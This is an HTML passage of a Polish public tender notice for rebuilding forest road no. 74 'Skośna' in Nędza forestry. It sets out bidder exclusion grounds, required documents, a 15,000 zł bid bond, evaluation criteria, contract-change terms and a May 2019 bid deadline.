postępowania,uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobówtechnicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze może miećnegatywny wpływ na realizację zamówienia.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Wykonawca w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowaw art. 86 ust. 5 ustawy PZP przekazuje Zamawiającemu oświadczenie o przynależności lub brakuprzynależności do tej samej grupy kapitałowej, o której mowa w ust. 1 pkt. 23 ustawy PZP(załącznik nr 5 do SIWZ). Wraz ze złożeniem oświadczenia, Wykonawca może przedstawićdowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji wpostępowaniu o udzielenie zamówienia. Oświadczenia tego nie należy składać wraz z ofertą!</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Przed udzieleniem zamówienia Zamawiający wezwie Wykonawcę, którego oferta została najwyżejoceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień ichzłożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25ust. 1 ustawy PZP tj. oświadczeń lub dokumentów potwierdzających spełnianie warunków udziałuokreślonych przez Zamawiającego: a) Wykazu robót budowlanych (załącznik nr 6 do SIWZ)wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, ajeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju,wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane zzałączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie wszczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawabudowlanego i prawidłowo ukończone, przy czym dowodami tymi są referencje bądź innedokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, ajeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskaćtych dokumentów - inne dokumenty b) Wykazu osób skierowanych przez Wykonawcę do realizacjizamówienia publicznego (załącznik nr 7 do SIWZ), w szczególności odpowiedzialnych zakierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych,uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanychczynności oraz informacją o podstawie dysponowania tymi osobami c) Wykazu narządzi luburządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia wraz z informacją opodstawie dysponowania tymi zasobami (załącznik nr 8 do SIWZ) d) Informacji z banku lubspółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środkówfinansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 1 miesiącprzed upływem terminu składania ofert,</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wraz z ofertą Wykonawca składa kosztorys ofertowy w formie uproszczonej (wg dołączonegoprzedmiaru robót - załącznik nr 11 do SIWZ), Wykonawca powołujący się na zasoby podmiotutrzeciego wraz z ofertą składa zobowiązanie tego podmiotu (załącznik nr 4 do SIWZ) doudostępnienia zasobu lub inny dokument pozwalający na jednoznaczne potwierdzenieudostępnienia. Wykonawca może polegać na zdolnościach technicznych lub zawodowych innychpodmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca wtakiej sytuacji musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponowałniezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tychpodmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien wyrażać wsposób jednoznaczny wolę udostępnienia Wykonawcy ubiegającego się o zamówienie,odpowiedniego zasobu, czyli wskazywać jakiego zasobu dotyczy, określać jego rodzaj, zakres, czasudostępnienia oraz inne okoliczności wynikające ze specyfiki danego zasobu. Z treściprzedstawionego dokumentu musi jednoznacznie wynikać: (1) zakres dostępnych Wykonawcyzasobów innego podmiotu, (2) sposób wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia, (3) zakres i okres udziału innego podmiotu przy wykonywaniuzamówienia publicznego; (4) czy podmiot, na zdolnościach którego Wykonawca polega wodniesieniu do warunków udziału w postępowaniu dotyczących, kwalifikacji zawodowych lubdoświadczenia, zrealizuje roboty budowlane, których wskazane zdolności dotyczą. Podmiotudostępniający Wykonawcy swoje doświadczenie celem wykazania spełnienia przez Wykonawcęwarunków udziału w postępowaniu musi obligatoryjnie uczestniczyć w wykonywaniu zamówienia(stać się podwykonawcą). Jeżeli uprawnienie do podpisania oferty nie wynika z dokumentówrejestrowych Wykonawca zobowiązany jest załączyć do oferty stosowne pełnomocnictwo do jejpodpisania. Pełnomocnictwo składane jest w oryginale lub kopii poświadczonej notarialnie. Jeżeliw dokumentach złożonych na potwierdzenie spełnienia warunków udziału w postępowaniujakiekolwiek wartości zostaną podane w walucie obcej to Zamawiający przeliczy wartość waluty nazłote według średniego kursu NBP z dnia przekazania ogłoszenia o zamówieniu do BiuletynuZamówień Publicznych. W przypadku oferty Wykonawców wspólnie ubiegających się o udzieleniezamówienia (np. konsorcjum): a) w formularzu oferty należy wskazać firmy (nazwy) wszystkichWykonawców wspólnie ubiegających się o udzielenie zamówienia, b) oferta musi być podpisana wtaki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzieleniezamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji.Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty - treść pełnomocnictwapowinna dokładnie określać zakres umocowania, c) wszyscy Wykonawcy wspólnie ubiegający sięo udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy, d)Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebieWykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywaniapoleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów, e) Zamawiającymoże w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lubod wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lubkażdego z osobna.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Zamawiający wymaga wniesienia wadium w wysokości 15 000,00 zł Wadium może być wnoszonew jednej lub kilku następujących formach: 1) pieniądzu, 2) poręczeniach bankowych lubporęczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jestzawsze poręczeniem pieniężnym, 3) gwarancjach bankowych, 4) gwarancjach ubezpieczeniowych,5) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity: tekstjednolity: Dz. U. z 2016 r. poz. 359 z późn. zm) Wadium wpłacane w pieniądzu należy wnieśćprzelewem na rachunek bankowy Zamawiającego podany w pkt. 1 niniejszej SIWZ z dopiskiem:,,Przebudowa drogi leśnej nr 74 ,,Skośnej" położonej w leśnictwie Nędza" Z treści wadiumwnoszonego w formie innej niż pieniężna powinno wynikać bezwarunkowe (na każde pisemneżądanie zgłoszone przez Zamawiającego w terminie związania ofertą) zobowiązanie gwaranta dowypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4aoraz art. 46 ust. 5 ustawy PZP. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli do upływuterminu składania ofert zostanie zaliczone na rachunku bankowym Zamawiającego. Wadiumwnoszone w formie innej niż pieniądz może być załączone do oferty lub złożone przed upływemterminu składania ofert w siedzibie Zamawiającego - sekretariat. Wadium musi zabezpieczać ofertęprzez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub niezabezpieczy oferty akceptowalną formą wadium w wyznaczonym terminie zostanie odrzucona napodstawie art. 89 ust. 1 pkt. 7b ustawy PZP. Treść gwarancji wadialnej musi zawierać następująceelementy: 1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia(Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającychgwarancji/poręczenia) oraz wskazanie ich siedzib, 2) określenie wierzytelności, która ma byćzabezpieczona gwarancją/poręczeniem - określenie przedmiotu zamówienia 3) kwotęgwarancji/poręczenia, 4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo inieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego wokolicznościach określonych w art. 46 ust. 4a PZP oraz art. 46 ust. 5 ustawy PZP. Zamawiający dokona zwrotu wadium zgodnie z art. 46 ust. 1 PZP wszystkim wykonawcom niezwłocznie powyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem Wykonawcy,którego oferta zostanie wybrana jako najkorzystniejsza z zastrzeżeniem art. 46 ust 4a PZP.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza Zamawiający zwróci wadiumniezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniuzabezpieczenia należytego jej wykonania. Zamawiający zatrzyma wadium w przypadkachokreślonych w art. 46 ust. 4a oraz art. 46 ust. 5 PZP.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>CENA</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>OKRES UDZIELONEJ GWARANCJI</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">W oparciu o art. 144 ustawy PZP, każda ze stron może żądać wprowadzenia zmian w umowie wstosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli wystąpi jedna zponiższych okoliczności: a) Zamawiający dopuszcza możliwość przedłużenia terminu realizacjiPrzedmiotu Umowy o okres odpowiadający okresowi trwania przeszkody uniemożliwiającej realizacjęPrzedmiotu Umowy jeżeli w trakcie obowiązywania Umowy wystąpią okoliczności uniemożliwiającejej realizację zgodnie z warunkami opisanymi w Umowie, za które odpowiedzialności nie ponosiWykonawca ani Zamawiający. W przypadku wystąpienia niekorzystnych warunków atmosferycznych,wymagających przerwania prac ze względów technologicznych, jeżeli konieczność wykonania prac wtym okresie nie jest następstwem okoliczności za które Wykonawca ponosi odpowiedzialnośćZamawiający przewiduje możliwość przesunięcia terminu zakończenia robót o okres przerwy. b)Zamawiający dopuszcza wprowadzenie zmian w sposobie wykonywania Przedmiotu Umowy, wprzypadku, gdy wystąpi co najmniej jedna z poniższych sytuacji: o konieczność zrealizowaniaPrzedmiotu Umowy przy zastosowaniu innych rozwiązań albo innymi środkami ze względu na zmianyobowiązującego prawa lub regulacji obowiązujących w Państwowym Gospodarstwie Leśnym LasyPaństwowe; o pojawienie się nowszych technologii wykonania prac gwarantujących co najmniej ten sam standard wykonania Przedmiotu Umowy oraz nie powodujących większych strat i zanieczyszczeńw środowisku naturalnym niż te, które mogą powstać przy wykonywaniu Przedmiotu Umowy wsposób pierwotnie nią opisany. c) Zamawiający dopuszcza wprowadzenie zmian części zamówienia,które Wykonawca przewidział do realizacji za pomocą podwykonawców na inne części zamówienia,w tym również na części, których Wykonawca nie wskazał w złożonej przez siebie ofercie. Zmiana niemoże pociągnąć za sobą zmiany terminu realizacji ani zwiększenia wynagrodzenia należnegoWykonawcy. d) W przypadku zawarcia Umowy z wykonawcami wspólnie ubiegającymi się oudzielenie zamówienia dopuszcza się zmianę członka konsorcjum upoważnionego do wystawianiafaktur i do odbioru wynagrodzenia w imieniu wszystkich członków konsorcjum. e) PonadtoZamawiający dopuszcza wprowadzenie zmian w przypadku zmiany powszechnie obowiązującegoprawa lub wewnętrznych przepisów wpływających na pogorszenie kondycji finansowejZamawiającego. Wystąpienie którejkolwiek z okoliczności wskazanych powyżej nie stanowizobowiązania Stron do wprowadzenia zmiany.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-05-08</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span 